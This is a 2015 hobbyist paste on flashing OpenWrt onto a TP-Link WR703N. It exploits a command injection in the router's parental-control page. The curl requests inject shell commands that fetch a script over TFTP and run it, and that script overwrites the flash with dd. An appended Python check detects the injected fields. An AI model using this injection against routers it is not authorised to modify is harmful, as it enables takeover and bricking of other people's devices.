bugblue

Upgrade WR703N V 1.17.1 to openwrt

Jan 29th, 2015
Upgrade your new WR703N V1.17.1 to OpenWrt.

WARNING: THIS CAN BRICK YOUR DEVICE. DO NOT RELY ON ANY OF THIS INFORMATION.
These are just hints on how I did it.

If you have no experience with WR703Ns, just buy an MR3020.

You'll need:
* A TFTP server (in my case 192.168.1.9; I advise using the same IP or understanding what the hell you're doing)
* A Unix or Mac workstation with curl (can be the same box)
* A general knowledge of Unix commands.
* An OpenWrt image. I make my own but stock 12.09 might work.
* A statically compiled busybox binary for MIPS.

The general idea:
* Put a script on your TP-Link WR703N
* Put a better busybox on your TP-Link WR703N
* Trick the WR703N into executing some commands to run this script.
The script:
* gets the first and second part of the image from TFTP
* flashes the first part of the image (1024k) to the mtd partition named kernel
* flashes the rest of the image (2819k) to the mtd partition named rootfs
* reboots the box with OpenWrt on it.

First set up the TFTP server and put the following files there:

=== file aa cut from here ======
cd /tmp
tftp -gl i1 192.168.1.9
tftp -gl i2 192.168.1.9
tftp -gl busybox 192.168.1.9
chmod 755 busybox
./busybox dd if=i1 of=/dev/mtdblock1 conv=fsync
./busybox dd if=i2 of=/dev/mtdblock2 conv=fsync
./busybox reboot -f
echo blaaat
=== /file aa cut to here =======
Put the rest there as well:
* busybox
* openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin

Cut the OpenWrt image into 2 parts. (Yes, these commands):
These commands can take a while since I had no interest in calculating a better blocksize.
dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i1 bs=1 count=1048576
dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i2 bs=1 skip=1048576

Now there are 4 files in your TFTP directory: aa, busybox, i1, i2

Now let's take a router and have it set to the factory settings.

Run these commands on your workstation.
# !!DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).!!
# First it wants a password set, let's do that. (the password is admin42 after this).
curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=true' 'http://192.168.1.1/'
# Secondly it wants to have parental control enabled (probably the once in a lifetime opportunity to use this).
curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?ctrl_enable=1&parent_mac_addr=00-00-00-00-00-02&Page=1'
# That being done, now all we need is to just simply exploit the router.
# readable it does:
# cd /tmp ; tftp -gl aa 192.168.1.9; sh aa
# DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).
curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.1.9;&url_2=;sh%20aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6'
# DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).

Just wait until it starts to blink, then OpenWrt is loading. Depending on your image you can reach it on its MAC address.

If you have no experience with WR703Ns, just buy an MR3020.
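
The last curl request above works because the url_0 to url_7 parental-control fields carry shell separators that end up being executed. As an added example (not part of the original paste and not TP-Link code), this check decodes those fields from a request URL or proxy log entry and flags any value that is not a plain host name; the SAFE_VALUE pattern and the BENIGN_REQUEST sample are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

PAGE = "/userRpm/ParentCtrlRpm.htm"
FIELD = re.compile(r"url_[0-7]")  # the eight URL slots seen in the paste's request
# Assumption: a legitimate slot holds only a host name or domain keyword.
SAFE_VALUE = re.compile(r"[A-Za-z0-9.-]{1,63}")

# Request copied from the paste above.
PASTE_REQUEST = ("http://192.168.1.1/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01"
                 "&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;"
                 "&url_1=;tftp%20-gl%20aa%20192.168.1.9;&url_2=;sh%20aa;&url_3=&url_4=&url_5="
                 "&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1"
                 "&rule_mode=0&Save=%B1%A3+%B4%E6")
# Constructed benign request for comparison.
BENIGN_REQUEST = ("http://192.168.1.1/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01"
                  "&url_0=example.com&url_1=&enable=1")


def suspicious_fields(request_url):
    """Return {slot: decoded value} for url_N values that are not plain host names."""
    parts = urlsplit(request_url)
    if parts.path != PAGE:
        return {}
    hits = {}
    # Split on '&' only: ';' must stay inside the value, it is the injected separator.
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)  # percent-decode so %20 and friends cannot hide anything
        if FIELD.fullmatch(name) and value and not SAFE_VALUE.fullmatch(value):
            hits[name] = value
    return hits


if __name__ == "__main__":
    for label, url in (("paste", PASTE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, suspicious_fields(url) or "clean")
```

The same allowlist, applied on the device before the values reach a shell, is the input validation this request shows to be missing.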